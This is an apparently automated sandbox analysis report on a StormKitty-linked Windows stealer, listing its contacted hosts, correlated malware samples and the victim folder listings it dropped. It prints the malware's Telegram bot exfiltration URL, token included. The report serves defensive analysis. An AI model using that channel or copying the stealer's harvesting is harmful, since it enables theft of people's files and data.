https://ac.ecosia.org/autocomplete?q=	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	URL Reputation: safe	unknown
https://github.com/LimerBoy/StormKitty	MSBuild.exe, 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=56350	MSBuild.exe, 00000006.00000002.2617809972.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	URL Reputation: safe	unknown
https://github.com/LimerBoy/StormKitty0&	MSBuild.exe, 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.orgd	MSBuild.exe, 00000006.00000002.2617809972.000000000317B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	places.raw.6.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/file/bot	Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	MSBuild.exe, 00000006.00000002.2617809972.000000000317B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pastebin.com	MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	false	URL Reputation: safe	unknown
https://pastebin.com	MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	true
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465084
Start date and time:	2024-07-01 09:17:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Kh7W85ONS7.exe renamed because original name is a hash value
Original Sample Name:	395c4070233d059b2f1661fbdc6af0b4.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@19/140@6/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 358 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.85.23.86, 199.232.214.172, 192.229.221.95, 13.95.31.18, 13.107.21.200, 204.79.197.200, 20.242.39.171, 23.43.61.160, 184.28.90.27, 199.232.210.172
Excluded domains from analysis (whitelisted): crl.edge.digicert.com, www.bing.com, a-0001.a-msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, cn-bing-com.cn.a-0001.a-msedge.net, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, crl3.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:19:18	API Interceptor	1x Sleep call for process: Kh7W85ONS7.exe modified
03:19:29	API Interceptor	351x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
104.21.44.66	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT	Browse
	a.cmd	Get hash	malicious	Unknown	Browse
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse
	HTZ4az17lj.exe	Get hash	malicious	StormKitty	Browse
	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	YVrNKlaWqu.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse
149.154.167.220	hatabat.exe	Get hash	malicious	Blank Grabber, DCRat, XWorm	Browse
	Evo Resou_nls..scr.exe	Get hash	malicious	AsyncRAT	Browse
	Wave.exe	Get hash	malicious	XWorm	Browse
	RFQ 52165 Materiale vario OENAGROUP.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	New Order Ergun Makina Hirdavat Tic #102718.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	Kyeryong Construction - Products List & Spec.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	w5APKwp5DD.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer	Browse
	qRD5vu6vkf.exe	Get hash	malicious	XWorm	Browse
104.16.185.241	w5APKwp5DD.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	wssvZm9dNK.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	icanhazip.com/
	INQUIRY.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	Order Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	Hniunx426q.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWorm	Browse	icanhazip.com/
	171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	Purchase Order Enquiry #PO-240902.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	opp.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse	104.21.44.66
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	w5APKwp5DD.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	172.67.196.114
	Hniunx426q.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWorm	Browse	172.67.196.114
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse	104.21.44.66
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.44.66
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT	Browse	104.21.44.66
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	a.cmd	Get hash	malicious	Unknown	Browse	104.21.44.66
api.telegram.org	hatabat.exe	Get hash	malicious	Blank Grabber, DCRat, XWorm	Browse	149.154.167.220
	Wave.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	RFQ 52165 Materiale vario OENAGROUP.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	New Order Ergun Makina Hirdavat Tic #102718.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Kyeryong Construction - Products List & Spec.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse	149.154.167.220
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	w5APKwp5DD.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	qRD5vu6vkf.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
bg.microsoft.map.fastly.net	http://muskevents.io	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://jiedian.dadabing023.workers.dev/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://aradcofeenet1.aradcofeenet1.workers.dev/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	199.232.214.172
	http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://sumydeko.blogspot.in/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://www.dgccollectors.com/doc.php	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://v.zzzytd.top/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://worker-lingering-frost-51ba.mhmdy000918.workers.dev/	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	56bDgH9sMQ.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://telegrambot-resolved.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	vjYcExA6ou.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	hatabat.exe	Get hash	malicious	Blank Grabber, DCRat, XWorm	Browse	149.154.167.220
	Evo Resou_nls..scr.exe	Get hash	malicious	AsyncRAT	Browse	149.154.167.220
	Wave.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	https://telegrambot-resolved.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	RFQ 52165 Materiale vario OENAGROUP.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	New Order Ergun Makina Hirdavat Tic #102718.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	2E7ZdlxkOL.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse	149.154.167.99
CLOUDFLARENETUS	fPqdDUeLwj.elf	Get hash	malicious	Mirai, Moobot	Browse	1.4.38.60
	AGREEMENT AND APPROVAL REPORT AERODYNE- RN & FR OF 2024-50254_6.5.24.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.159.201
	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	scan19062024.exe	Get hash	malicious	FormBook	Browse	172.67.205.232
	Leadership Development.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	Electronic Slip_ball.com.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	6Z4Q4bREii.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://www.teamviewer.com/en-in/download/windows/	Get hash	malicious	Unknown	Browse	104.19.178.52
	SecuriteInfo.com.Win64.Evo-gen.2830.16242.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	https://www.salestrackingportals.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
CLOUDFLARENETUS	fPqdDUeLwj.elf	Get hash	malicious	Mirai, Moobot	Browse	1.4.38.60
	AGREEMENT AND APPROVAL REPORT AERODYNE- RN & FR OF 2024-50254_6.5.24.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.159.201
	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	scan19062024.exe	Get hash	malicious	FormBook	Browse	172.67.205.232
	Leadership Development.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	Electronic Slip_ball.com.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	6Z4Q4bREii.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://www.teamviewer.com/en-in/download/windows/	Get hash	malicious	Unknown	Browse	104.19.178.52
	SecuriteInfo.com.Win64.Evo-gen.2830.16242.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	https://www.salestrackingportals.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
CLOUDFLARENETUS	fPqdDUeLwj.elf	Get hash	malicious	Mirai, Moobot	Browse	1.4.38.60
	AGREEMENT AND APPROVAL REPORT AERODYNE- RN & FR OF 2024-50254_6.5.24.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.159.201
	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	scan19062024.exe	Get hash	malicious	FormBook	Browse	172.67.205.232
	Leadership Development.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	Electronic Slip_ball.com.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	6Z4Q4bREii.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://www.teamviewer.com/en-in/download/windows/	Get hash	malicious	Unknown	Browse	104.19.178.52
	SecuriteInfo.com.Win64.Evo-gen.2830.16242.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	https://www.salestrackingportals.com/	Get hash	malicious	Unknown	Browse	104.18.11.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Purchase Order Project No.8873_ECOFIX.exe	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	Purchase Order Project No.8873_ECOFIX.exe	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	D5u70TJkrE.exe	Get hash	malicious	DCRat	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	Vsl_MV DART TRADER_001.exe	Get hash	malicious	AgentTesla	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	SecuriteInfo.com.Malware.Win32.Obfus.32567.16915.exe	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	Nichiden Viet Nam - RFQ List & Specification..exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	d5raNaLQ8Q.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	104.20.3.235 104.21.44.66 149.154.167.220

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	188155
Entropy (8bit):	7.9237459136280455
Encrypted:	false
SSDEEP:	3072:BD8QCldGYMKlV7j92LiwVWujT6lUOXH5fnhcKQKxtp0wsGi:fiw8uaRHNna8tMGi
MD5:	0523FBFEEE25E85D3DE3C2682C28A4D0
SHA1:	25A8205695AF83142E96E8F0FB75F60B799A571C
SHA-256:	A3ADD0434366090F705BE81850E1ECB7A7C42F2FE3BF766EC3ABE520B16F81BC
SHA-512:	FF7B1E76E863A62C62211A471F9695E3B42711CFB43F879509404A78CC8295B4C88AF59F8F4DE877CFC7F0362F200F9499096C2A7213FD597B31089F41DE4261
Malicious:	false
Reputation:	low
Preview:	PK.........D.X................Browsers\Edge\PK.........D.X................Browsers\Google\PK........k..XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........k..X..';~...5.......Directories\Desktop.txt}..n.0.E.._......1...Kh.&M.....@L4U.3b...D.y.s....V..,gFe.U....c[2W1,..r..Wq.2..B7.Z.IK...P..p.?........p.\.oA..fl...M..P.}w...T.2..}.O.N..4\...Z.U........u3..X......r#.!....1..`...&.UHx.......%...U....l."T64.Y...%..E...I2s.-.!m...UT..u}s)e...G....'..fa.L#H@.nenB.f..J3.?..n5.s...I@L....qw.....F.Mw@.......0`0_......z}...n...`...<%..4.........N.....b.....z...PK........k..X.Z<.............Directories\Documents.txt}S..0.<;U.........,@H.@<j/.CR$...;...D2....g..nu...t............T.L..cZ....V..02L..VL..gy..[..%RVH..t.a;~8.9.._....W..[.n<....).4'Y0u.m..4.u...\.o.:i..R3.s..kYGF..U[..w...f:d{EbS. ~.......)..M.n.&.......!w...6N.p..Gr8../.Sv../....0...p}........+...]?.....2.#{(Qv.ed..V..R#.D..1.

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1077
Entropy (8bit):	5.248636792371089
Encrypted:	false
SSDEEP:	24:9OvseIgoUp0MwkOJ1PaLAoXX2cP7lysNWnrqpPHG50Kkpl2BiPAkkklysQVo4vss:9OvseIyaWOJla8oXF78sNWnrqpPHdT6z
MD5:	1F39690AC31C0D0299A368580C5D813E
SHA1:	095162E3F452438E977B5724753D9655637D2A30
SHA-256:	07B55D8FA2DFC4808A20D8202C676CD4576984E51449EEC670EA20315D784FD7
SHA-512:	B6C3682353BE9F45CEDF946B4B2EAD4A0FF1CBAB8052A3BEE4FEA58EF1535B69CEF429846E482F9DEA2BDDC147A824E076C4765C5215315A9E80CEA2CCE02A9D
Malicious:	false
Preview:	Desktop\...BNAGMGSPLO\...EEGWXUHVUG\...GAOBCVIQIJ\...IPKGELNTQY\....BJZFPPWAPT.png....EEGWXUHVUG.jpg....GAOBCVIQIJ.xlsx....IPKGELNTQY.docx....SUAVTZKNFL.pdf....ZGGKNSUKOP.mp3...KLIZUSIQEN\...MXPXCVPDVN\....GAOBCVIQIJ.jpg....IPKGELNTQY.xlsx....LSBIHQFDVT.pdf....MXPXCVPDVN.docx....QCFWYSKMHA.png....SUAVTZKNFL.mp3...NYMMPCEIMA\...PALRGUCVEH\...SFPUSAFIOL\....EFOYFBOLXA.mp3....LSBIHQFDVT.xlsx....QNCYCDFIJJ.pdf....SFPUSAFIOL.docx....SQSJKEBWDT.png....SUAVTZKNFL.jpg...UOOJJOZIRH\....IPKGELNTQY.jpg....LSBIHQFDVT.mp3....MXPXCVPDVN.xlsx....NEBFQQYWPS.png....SFPUSAFIOL.pdf....UOOJJOZIRH.docx...ZGGKNSUKOP\...ZQIXMVQGAH\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.jpg...EFOYFBOLXA.mp3...Excel.lnk...GAOBCVIQIJ.jpg...GAOBCVIQIJ.xlsx...IPKGELNTQY.docx...IPKGELNTQY.jpg...IPKGELNTQY.xlsx...Kh7W85ONS7.exe...LSBIHQFDVT.mp3...LSBIHQFDVT.pdf...LSBIHQFDVT.xlsx...MXPXCVPDVN.docx...MXPXCVPDVN.xlsx...NEBFQQYWPS.png...QCFWYSKMHA.png...QNCYCDFIJJ.pdf...SFPUSAFIOL.docx...SFPUSAFIOL.pdf...SQSJKEBWDT.png...SUAVTZKN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Documents.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	5.346336941514699
Encrypted:	false
SSDEEP:	24:TOvseIgoUp0MLfxrqEE4kOJ1PaLAoXX2cP7lysNWnr60Kkpl2BiPAkkklysQVo4f:TOvseIyaiBqEEpOJla8oXF78sNWnrFTg
MD5:	32A502D72F3E993C052D2F89E7662605
SHA1:	E1A953BE324D682995A0CAC24C19E1BA24208A70
SHA-256:	BAE33146B1249C4A598D40EAFE4DA6BF89C8ED9F8731D17D2C84EBACD432452F
SHA-512:	607F85D1813EA9EBA2D80047C7F02C9E78D6E6F956B6175BE66C3A1403910F449F3112F84CBF285DDF9A74AFC3D41110FD002BB4285E694A9E89F362526CCCBA
Malicious:	false
Preview:	Documents\...BNAGMGSPLO\...EEGWXUHVUG\...GAOBCVIQIJ\...IPKGELNTQY\....BJZFPPWAPT.png....EEGWXUHVUG.jpg....GAOBCVIQIJ.xlsx....IPKGELNTQY.docx....SUAVTZKNFL.pdf....ZGGKNSUKOP.mp3...KLIZUSIQEN\...MXPXCVPDVN\....GAOBCVIQIJ.jpg....IPKGELNTQY.xlsx....LSBIHQFDVT.pdf....MXPXCVPDVN.docx....QCFWYSKMHA.png....SUAVTZKNFL.mp3...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NYMMPCEIMA\...PALRGUCVEH\...SFPUSAFIOL\....EFOYFBOLXA.mp3....LSBIHQFDVT.xlsx....QNCYCDFIJJ.pdf....SFPUSAFIOL.docx....SQSJKEBWDT.png....SUAVTZKNFL.jpg...UOOJJOZIRH\....IPKGELNTQY.jpg....LSBIHQFDVT.mp3....MXPXCVPDVN.xlsx....NEBFQQYWPS.png....SFPUSAFIOL.pdf....UOOJJOZIRH.docx...ZGGKNSUKOP\...ZQIXMVQGAH\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.jpg...EFOYFBOLXA.mp3...GAOBCVIQIJ.jpg...GAOBCVIQIJ.xlsx...IPKGELNTQY.docx...IPKGELNTQY.jpg...IPKGELNTQY.xlsx...LSBIHQFDVT.mp3...LSBIHQFDVT.pdf...LSBIHQFDVT.xlsx...MXPXCVPDVN.docx...MXPX

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	442
Entropy (8bit):	5.270679790490107
Encrypted:	false
SSDEEP:	12:aj6LK0rMxH/+zW00K1mpl2BVWvWiPAkkklysQVoPgvskWC:aZr60Kkpl2BiPAkkklysQVo4vskWC
MD5:	A8889EF20CA9FD35C4F473EC576B139B
SHA1:	945A6F7BCFD6BF36F3ED7114A4A333517BD81F0D
SHA-256:	77B7AE4B991FE5A6CD0B24D82FECA5AECB77FFB1FD2648557D3461F6B7212C39
SHA-512:	15C1AA7F057565EDD504F6BF8941AE61D866BD1152FB40BE01A78F1CB95CB2288C69EC002B1E19A4CE6938D771184884F4255C34FC98AFE4F6FE624EE6ADBFDF
Malicious:	false
Preview:	Downloads\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.jpg...EFOYFBOLXA.mp3...GAOBCVIQIJ.jpg...GAOBCVIQIJ.xlsx...IPKGELNTQY.docx...IPKGELNTQY.jpg...IPKGELNTQY.xlsx...LSBIHQFDVT.mp3...LSBIHQFDVT.pdf...LSBIHQFDVT.xlsx...MXPXCVPDVN.docx...MXPXCVPDVN.xlsx...NEBFQQYWPS.png...QCFWYSKMHA.png...QNCYCDFIJJ.pdf...SFPUSAFIOL.docx...SFPUSAFIOL.pdf...SQSJKEBWDT.png...SUAVTZKNFL.jpg...SUAVTZKNFL.mp3...SUAVTZKNFL.pdf...UOOJJOZIRH.docx...ZGGKNSUKOP.mp3..

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
